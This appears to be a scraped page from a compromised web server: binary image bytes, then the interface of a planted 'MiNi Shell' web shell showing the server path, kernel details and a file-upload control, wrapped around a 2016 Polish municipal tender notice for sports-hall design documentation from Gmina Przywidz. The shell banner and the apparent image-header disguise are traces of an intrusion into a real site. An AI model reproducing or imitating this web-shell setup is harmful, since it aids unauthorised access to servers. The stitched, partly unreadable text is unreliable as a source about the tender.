JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160229/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160229/44228-N-2016.html

<p class="kh_header"><b>Przywidz: Opracowanie dokumentacji projektowej dla zadania Rozbudowa bazy dydaktyczno-sportowej na terenie Gminy Przywidz z zastosowaniem odnawialnych źródeł energii.</b><br>
<b>Numer ogłoszenia: 44228 - 2016; data zamieszczenia: 29.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Przywidz , ul. Gdańska 7, 83-047 Przywidz, woj. pomorskie, tel. 058 6825146, faks 058 6825225.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.przywidz.pl/zamowienia-publiczne</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej dla zadania Rozbudowa bazy dydaktyczno-sportowej na terenie Gminy Przywidz z zastosowaniem odnawialnych źródeł energii..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1 Przedmiot zamówienia dotyczy opracowania dokumentacji projektowej projekt budowlany 
i wykonawczy sal sportowych dla szkół podstawowych w miejscowości Pomlewo i Trzepowo wraz 
z uzyskaniem decyzji o pozwoleniu na budowę. Zakres zamówienia obejmuje również nadzór autorski nad realizacją robót zawartych w zamawianej dokumentacji projektowej w ramach wynagrodzenia za jej opracowanie oraz bezpłatną aktualizację kosztorysu inwestorskiego w ciągu 2 lat od daty przekazania Zamawiającemu przedmiotu umowy.
część 1 opracowanie dokumentacji projektowej budowy sali sportowej przy Szkole Podstawowej 
w Trzepowie
część 2 opracowanie dokumentacji projektowej budowy sali sportowej przy Szkole Podstawowej 
bł ks Jerzego Popiełuszki w Pomlewie
2 Podstawy opracowania

21 Opis przedmiotu zamówienia zał nr 1 i 2 do SIWZ
22 Wytyczne programu LEMUR Energooszczędne Budynki Użyteczności Publicznej realizowanego przez Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej dokumentacja projektowa będzie przedmiotem wniosku o dofinansowanie w ramach ww programu
23 Obowiązujące normy i normatywy techniczne
3.  Dokumentacja projektowa  zestawienie dokumentów
3.1  Mapa do celów projektowych w skali 1:500 w wersji papierowej oraz cyfrowej (dwg lub dxf).
3.2 Wykonanie badań podłoża gruntowego z dokumentacją tych badań w zakresie niezbędnym 
do wykonania przedmiotowej inwestycji,
3.3 Prace projektowe
wykonanie koncepcji programowo przestrzennej tj wstępnej propozycji rozwiązań funkcjonalnych w budynku, propozycję doboru materiałów budowlanych i kolorystyki, propozycję zagospodarowania terenu, 
wykonanie projektu budowlanego wraz ze wszystkimi wymaganymi uzgodnieniami i opiniami niezbędnymi do uzyskania decyzji o pozwoleniu na budowę,
 wykonanie projektów wykonawczych 
3.3.1 Wymagane elementy projektu budowlanego.
A. Projekt zagospodarowania terenu, a w nim
a określenie przedmiotu inwestycji,
b bilans mas ziemnych terenu,
c zagospodarowanie działki oraz obiektów projektowanych, ogrodzenia, małej architektury, zieleni, komunikacji i uzbrojenia terenu,
B. Projekt architektoniczno budowlany, a w nim
a rozwiązania architektoniczno  budowlane,
b rozwiązania budowlano - instalacyjne,
c powiązanie obiektów z sieciami zewnętrznymi,
3.3.2 Wymagane elementy projektu wykonawczego:
A. Projekty wykonawcze związane z zagospodarowaniem działki lub terenu
a Projekty wykonawcze związane z ewentualną przebudową uzbrojenia podziemnego na działce, dotyczące sieci wodociągowej, kanalizacyjnej, ciepłowniczej, energetycznej, oświetleniowej, teletechnicznej lub układu komunikacyjnego.
b Ewentualne projekty makroniwelacji i gospodarki masami ziemnymi, lub dotyczące sposobu wykonania robót ziemnych.
c Projekty wykonawcze sieci wodociągowej, kanalizacyjnej, deszczowej, grzewczej, gazowej, energetycznej, oświetlenia zewnętrznego, teletechnicznych, uziemień i innych, przewidzianych 
w projekcie zagospodarowania działki lub terenu.
d Projekt dróg, parkingów i ewentualnie innej komunikacji.
e Projekt zieleni.
f Projekt urządzeń malej architektury.
g Zbiorczy plan uzbrojenia terenu. 
h Projekt ogrodzenia terenu.
B. Projekty wykonawcze architektoniczno-budowlane obiektów przewidzianych do zrealizowania 
w projekcie zagospodarowania działki lub terenu
a Projekty wykonawcze architektury poszczególnych obiektów, obejmujące co najmniej rzuty, przekroje i elewacje, wykazy stolarki, ślusarki, wykończenia i wyposażenia pomieszczeń itp.
b Projekty detali architektonicznych.
c Projekty wnętrz wszystkich pomieszczeń.
d Projekty wykonawcze konstrukcji poszczególnych obiektów, obejmujące
projekty zabezpieczeń wykopów, pompowania wody itp.,
projekty konstrukcyjne fundamentów,
projekty elementów konstrukcji podstawowej oraz innych elementów nośnych i przykryć,
projekty samodzielnych elementów konstrukcji, jak fundamenty pod urządzenia technologiczne wraz z zabezpieczeniem akustycznym i antywibracyjnym, rampy, schody, zadaszenia, zbiorniki, kominy itp
e Projekty wykonawcze instalacji występujących w obiektach:
projekty instalacji kanalizacyjnych, wodnych i cieplnych,
projekty instalacji przeciwpożarowych wodnych jeżeli będą konieczne,
projekt kotłowni 
projekty instalacji centralnego ogrzewania i ciepła technologicznego,
projekty instalacji elektroenergetycznych, obejmujące: instalacje siły, instalacje technologiczne, instalacje oświetlenia ogólnego, instalacje oświetlenia dozorowego, instalacje oświetlenia bezpieczeństwa, instalacje oświetlenia ewakuacyjnego, 
projekty wykonawcze instalacji teletechnicznych, tj instalacji sygnalizacji pożaru, instalacji alarmowej włamania i napadu, LAN, telefonii cyfrowej, sieci TV sat, monitoringu wewnątrz i na zewnątrz.
3.4 inwentaryzacja drzew i krzewów do usunięcia materiały do wniosku o wycinkę drzew 
i krzewów. Dokumentacja musi zostać sporządzona zgodnie z przepisami ustawy z dnia 16 kwietnia 2004 r.  o ochronie przyrody Dz. U. z 2009 r. Nr 151 poz. 1220 z późn. zm 
3,5. wykonanie karty informacyjnej i ewentualnego raportu oddziaływania na środowisko  
w postępowaniu o wydanie decyzji środowiskowej wraz z jej uzyskaniem w razie konieczności.  Dokumentacja musi zostać sporządzona zgodnie z art. 3 ust. 1 pkt. 5 ustawy z dnia 05. 10. 2008 roku o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko Dz. U. z 2013 r. poz. 1235 z p. zm.
3.6 Zestawienie sprzętu sportowego wraz ze specyfikacją techniczną poszczególnych urządzeń. 
3.7 Instrukcje obsługi i eksploatacji obiektu, instalacji i urządzeń związanych z obiektem.

4. Dodatkowe informacje 

4.1 W wycenie należy uwzględnić koszty uzyskania wszystkich map, uzgodnień, decyzji, opinii, postanowień, opłat niezbędnych do uzyskania prawomocnej decyzji pozwolenia na budowę i wykonania zadania, zgodnie z obowiązującymi przepisami.
4.2. W wycenie należy uwzględnić nadzór autorski nad realizacją robót zawartych 
w zamawianej dokumentacji projektowej w ramach wynagrodzenia za jej opracowanie oraz bezpłatną aktualizację kosztorysu inwestorskiego w ciągu 2 lat od daty przekazania Zamawiającemu przedmiot umowy.
4.3 W wycenie należy uwzględnić koszty wykonania całej dokumentacji w wersji  elektronicznej w tym również projektu budowlanego z czerwonymi pieczątkami w formatach pdf, ath,, docxlsxlsx. Dokumentację projektową w wersji elektronicznej należy do Zamawiającego przekazać w formie
a  skan dokumentacji opisowej w formatach rozmiarach jak wersja papierowa, w kolorze z rozdzielczością 300 dpi zapisując je w plikach PDF,
b skan dokumentacji graficznej w formatach rozmiarach jak wersja papierowa, w kolorze z rozdzielczością od 300 dpi  zapisując je w plikach TIFF lub JPG ewentualnie PDF,
c dodatkowo wersja wektorowa dokumentacji graficznej w postaci plików CAD, takich jak DWG albo DXF lub np. ShapeFile lub GML ostatnich wersji projektów. Wymienione pliki powinny być
a w układzie geodezyjnym 2000 strefa 18,
b skala opracowania 1:500,
c obiekty warstw wektorowych powinny posiadać niepowtarzalne identyfikatory pozwalające powiązać je z częścią opisową dotyczy ShapeFile i GML,
d część graficzna w postaci wektorowej obejmować będzie warstwy tematyczne:
e warstwy winny zachować poprawność topologiczną, wewnętrzną oraz względem warstw referencyjnych.

5. Dostarczenie opracowania projektowego 

Lp. 	Dokumentacja	Ilość egz. 
w formie papierowej	Ilość egz. 
w formie elektronicznej 
1	Kompletna dokumentacja projektowa	5	1
2	Projekt budowlany- oryginał	2	1
3	Kosztorys inwestorski	3	1
4	Przedmiar robót 	3	1
5	Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych	3	1
6	Matryce map zasadniczych, na bazie, których został opracowany przedmiot umowy.	1
7	Teczka z oryginałami wszelkich uzyskanych uzgodnień	1	1


6. Zamawiający wymaga, aby dokumentacja projektowa w zakresie opisu proponowanych materiałów
 i urządzeń była zgodna z art. 26 ustawy. W przypadku, gdy Wykonawca sporządzając dokumentację projektową będzie powoływał się na pochodzenie marka, znak towarowy, producent, dostawca materiałów oraz na normy, o których mowa w art. 30 ust. 1 3 ustawy, wówczas jest zobowiązany
wskazać w dokumentacji, że dopuszcza oferowanie materiałów lub rozwiązań równoważnych,
doprecyzować zakres dopuszczalnej równoważności.
7. Uprawnienia Zamawiającego z tytułu rękojmi za wady dokumentacji projektowej wygasają 
w stosunku do Wykonawcy wraz z wygaśnięciem odpowiedzialności wykonawcy robót z tytułu rękojmi za wady wykonanych robót na podstawie tego projektu, jednak nie później niż 5 lat od bezusterkowego odbioru przedmiotu niniejszej umowy.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.80.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 180.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia w niniejszym postępowaniu
nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek jeżeli wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował, co najmniej dwie usługi dot. wykonania dokumentacji projektowej, w tym jedna w zakresie robót konstrukcyjno-budowlanych, wodno-kanalizacyjnych, elektrycznych, o wartości nie mniejszej niż 100 000,00 brutto łącznie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w zakresie dysponowania przez Wykonawcę odpowiednim potencjałem technicznym. Warunek dotyczący dysponowania przez Wykonawcę odpowiednim potencjałem technicznym Zamawiający uzna za spełniony na podstawie złożonego oświadczenia - stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający uzna za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował przynajmniej jedną  osobą, która posiada uprawnienia do projektowania w specjalności:

-architektonicznej
-konstrukcyjno-budowlanej
-instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych 
i kanalizacyjnych`
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku dotyczącego sytuacji ekonomicznej i finansowej. Zamawiający uzna warunek za spełniony na podstawie złożonego oświadczenia - stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - termin wykonania dok. projektowej - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron wyrażoną 
w formie pisemnego aneksu pod rygorem nieważności.
2. Zamawiający dopuszcza możliwość wprowadzenia istotnych zmian do umowy w zakresie określonym w ust. 3-5 na warunkach określonych w ust. 6.
3. Zamawiający dopuszcza możliwość przedłużenia terminu wykonania umowy:
1) w przypadku trudności z uzyskaniem map niezależnych od Wykonawcy,
2) jeżeli przedłużeniu ulegną procedury administracyjne związane z uzyskaniem decyzji o pozwoleniu na budowę oraz procedury administracyjne związane z pozostałymi pozwoleniami, uzgodnieniami 
i zgodami z przyczyn niezależnych od Wykonawcy.
4. Zamawiający przewiduje możliwość zmiany personelu Wykonawcy przy realizacji zamówienia 
w przypadku wystąpienia okoliczności niemożliwych do przewidzenia, np. śmierci, choroby, rezygnacji, innych zdarzeń losowych lub też nie wywiązywania się specjalisty z obowiązków wynikających 
z umowy.
5. Zamawiający przewiduje możliwość zmiany umowy w przypadku zmiany przepisów dotyczących stawki podatku od towarów i usług (VAT).
6. Warunki dokonywania zmian:
1) zmiana może być inicjowana na wniosek Zamawiającego lub Wykonawcy, przy czym strona wnioskująca zobowiązana jest do szczegółowego uzasadnienia proponowanych zmian, np.: prawidłowa realizacja przedmiotu zamówienia, gospodarność, efektywność, itp.,
a) zmiana umowy nie może naruszać zasady zachowania uczciwej konkurencji oraz równego traktowania Wykonawców,
b) zmiana nie może spowodować wykroczenia usługi poza przedmiot zamówienia opisany 
w zaproszeniu do negocjacji oraz umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.przywidz.pl/zamowienia- publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Przywidz
ul. Gdańska 7
83-047 Przywidz
pok. 2.3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.03.2016 godzina 10:00, miejsce: Gmina Przywidz
ul. Gdańska 7
83-047 Przywidz
pok. 2.4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com